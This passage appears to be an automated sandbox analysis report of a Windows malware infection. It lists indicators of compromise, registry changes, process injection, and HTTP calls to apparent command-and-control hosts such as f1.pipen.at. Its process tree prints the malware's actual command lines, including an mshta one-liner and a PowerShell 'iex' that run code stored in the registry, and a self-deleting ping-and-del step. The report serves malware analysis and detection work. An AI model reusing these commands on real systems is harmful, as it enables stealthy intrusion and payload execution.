2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 504 powershell.exe 2992 Explorer.EXE 2992 Explorer.EXE 2992 Explorer.EXE 2108 cmd.exe 2992 Explorer.EXE -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 504 set thread context of 2992 504 powershell.exe 57 PID 2992 set thread context of 3460 2992 Explorer.EXE 60 PID 2992 set thread context of 4068 2992 Explorer.EXE 71 PID 2992 set thread context of 2108 2992 Explorer.EXE 82 PID 2108 set thread context of 2912 2108 cmd.exe 84 PID 2992 set thread context of 1048 2992 Explorer.EXE 95 -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2912 PING.EXE -
Checks whether UAC is enabled 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30807333" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0ea33662515d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1910551314" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30807333" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9D3475C3-8118-11EA-8133-4A0051343CE8} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006277417e0e384844bb6ae38577795032000000000200000000001066000000010000200000009711a8fe40825630777dcb49f067a14054d223174106a138a06cdc78b77a2a04000000000e800000000200002000000009bf61e6c2738e8eafc5c1f399aa9c216e00047dfffcb10667f80bb2267aaede200000006ecec74d917f7c2ae436d279b649e1a9a98e1c6e0ff0f7546001780f917fd78b40000000940b8c5ddabebf2ed059d6f3d658a2948efc249ae1d1702908ed8199382a50f0c7c6a8a26762e407d87f727443e0f8c67f24ef21fec2d3c0b72181fa2bbc95ac iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1910551314" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006277417e0e384844bb6ae385777950320000000002000000000010660000000100002000000055110250485d49c529b9806e304d10be354db995f629da8ad47bf46218201638000000000e8000000002000020000000ae5ead7e09082cd3e1b898abf0281fab5d384fff5388a2b1e5ea48cdefb7f12d200000008cc47ec85417fd51562861e7492f9fdb7a1c5285d58840af6da4075117e891c3400000001ef231dc56c49c2039d51016c3760dbafe1512f18499dfff32ce0efbe70682d931820ac6219c4d918d010ce869b2dba6bd948f2e0f0e0ff94a640ff4c1723186 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 606d1f652515d601 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30807333" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1934145350" IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4068 iexplore.exe 4068 iexplore.exe 3620 IEXPLORE.EXE 3620 IEXPLORE.EXE 4068 iexplore.exe 4068 iexplore.exe 3592 IEXPLORE.EXE 3592 IEXPLORE.EXE 4068 iexplore.exe 4068 iexplore.exe 3620 IEXPLORE.EXE 3620 IEXPLORE.EXE -
Makes http(s) request 13 IoCs
Contacts server via http/https, possibly for C2 communication.
description flow ioc HTTP URL 7 http://f1.pipen.at/favicon.ico HTTP URL 6 http://f1.pipen.at/api1/4gk6h2qSNlNmxq0rzjgmR/3OUXxlmVLituQHvF/r0oIAWOrHNOtCsR/niODCfdRb0Dl8zyQlt/E6ty8caKn/k_2BxBMxm1ZfQwlLkgii/koZKCEL9Vg_2BVSPNXh/dJ9U_2B_2FnxTOc7cRaCT4/c6VskSaqi0DCP/NYXRqqcl/6IpbAnDF1hRb4GgvEkK3WlM/18Iy3783ZU/H2mp02rfG5bKzjwqC/Pu6q5577R5ow/LFPAi0StCoe/_2F16i8M7JIoJT/VuiXNnIYaV8hCs_0A_0DX/iE0teQXPq2EaxReq/HM_2FpdvewqDsy7/7OJnyg0gdfr4fJvRPX/AK5JwtD90hukc/lEGk_2FO/R HTTP URL 28 http://vv.malorun.at/api1/2hSumRD9/ehwSl9ZV_2B7OJfZYITL9_2/Fc1JaMt788/dg7RTo5cByuD8Q_2B/SGsrRs03tu13/ckPqoDwYNTI/Pzs5y3IbwprhRc/xCi9WfFxtbSdKRKGAX_2B/XD1o9wiCzJek_2BF/C1RXpR2Yrkt6f1r/n1mFxXVposeTe7RxTw/Euu_2BYH4/KspfCa02WJux8zQtl4CY/stE2rxJgbtnkD2mGuDw/wpcpSlTtpaTn8TCohdfJ_2/B88hQZcg8CQ_2/BX1WbrSf/IV48D76roPmz_0A_0D40XS8/Q0IAca3uVv/JvJ04C6RDIc4ZYvRN/ciPnWWHJg/iIxSXo HTTP URL 29 http://vv.malorun.at/api1/5QJznOBpRLy/cbTEuEDm_2F2NI/9pHz3L3W5kJe8SuKtTkh9/RAPNIWCoi06mIIuo/2CDiczBVLX4Xt8r/6aBG_2BC2qEVPigr4z/AAEXE4Fqe/arrnAO6LkBIRf_2Bddy1/VRCwsS4yh9mS8iLuoJG/nFO_2B6BI8FvVmm74_2BvY/9_2Fa_2Fyyqma/J_2FOsjq/3dmKTpX1_2BqNpa4JwHxEOE/XB_2FQb1ey/rhayZfvcBC6IP1WGD/MZSc9DyOLwLi/w5VvQViPiF2/19WpLPYl6XESw_/0A_0DW862Cqu6L7drnMWe/oqkkdLG0bzzz6urw/dCd6YBJ3G/5wL8Qg HTTP URL 16 http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?19fd378bf4a421c4 HTTP URL 19 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlist.xml HTTP URL 18 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP URL 5 http://f1.pipen.at/api1/9yw0L4D_2B4Tm/V2ScnnLS/axQpcQud_2Fv62TiQamDclY/mGVUxrLxx6/FUtCE1JOA92o2Yzqt/zIy_2F0du_2B/9tDX75sOBBz/25iQzBmDwVJKk_/2F0IGt_2FikYCQo0ixYU1/xWGQhQVy0jreavUe/p99aRBjG83clEFD/6vY6_2BOBD2OLH17Kh/_2F8VVBDw/ov4kEB_2FU5Yh1y_2FLj/eYaq4BJqQpwuxZyVl8C/vuBzNcARmiQPHVHQRLFnOK/bLy1VzEregVrw/7GF7Yzyd/IOe_0A_0DZJHbDR0GuSlhkt/YiXegJ2CJA/bfxLSvhTJs6HAK7kv144I/fg HTTP URL 8 http://f1.pipen.at/favicon.ico HTTP URL 9 http://f1.pipen.at/api1/sGKt9ncuUww5ys_2FBlEj/H1f2WSo45VQ1GeMC/JrOEMy8RvKV1AIi/U9q4zfWRdEDcNy8uJ6/HU5DYaQYK/7fKGmASBaDiT669A32j6/_2BYVPDyeUgUsGC3BeQ/N3G3EH2CL_2Bc2WF9XJhPO/ex9qEtVD66ceW/psxHiTiA/xL3kK4f8OEBJP0cmmvUI1Rv/ey23KAiZ3H/GrXvWldYZ5u4U8wpk/8B3ZpngUTst9/OvxlU2p56sZ/fsHcjeY_2FrwNw/stmd4R00fdr2_0A_0D_2B/or6_2B2z4VkIO5V8/76TZTzawY_2BIno/mmB2kb8HtUpXvhBmcz/pRQ27sFNawVgoD50RZn/6za HTTP URL 12 http://api10.dianer.at/jvassets/xI/t64.dat HTTP URL 14 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlist.xml HTTP URL 36 http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?9362176b671cd1a1 -
Loads dropped DLL 1 IoCs
pid Process 1720 regsvr32.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2992 -
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\view_presentation_o0k.js2⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\XkKBGbRTFlXi.txt3⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\SysWOW64\regsvr32.exeC:\Users\Admin\AppData\Local\Temp\\XkKBGbRTFlXi.txt4⤵
- Loads dropped DLL
PID:1720
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\786D016B-7752-6A8D-C12C-9B3E8520FF52\\Apdsprov'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\786D016B-7752-6A8D-C12C-9B3E8520FF52").Assioker))3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:504 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ejlyv34d\ejlyv34d.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES948A.tmp" "c:\Users\Admin\AppData\Local\Temp\ejlyv34d\CSC9248F7A134EF4B92B32AF1781DC3034.TMP"5⤵PID:1360
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nquu3jx1\nquu3jx1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9574.tmp" "c:\Users\Admin\AppData\Local\Temp\nquu3jx1\CSCB24DD0A1F72C4E8AA7BF68A1AA1BDEB.TMP"5⤵PID:1636
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\XkKBGbRTFlXi.txt"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2108 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2912
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\958.bi1"2⤵PID:420
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:752
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\978.bi1"2⤵PID:3164
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2728
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\958.bi1"2⤵PID:2720
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\978.bi1"2⤵PID:3132
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:1048
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3460
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4068 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4068 CREDAT:82945 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3620
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4068 CREDAT:82950 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3592
-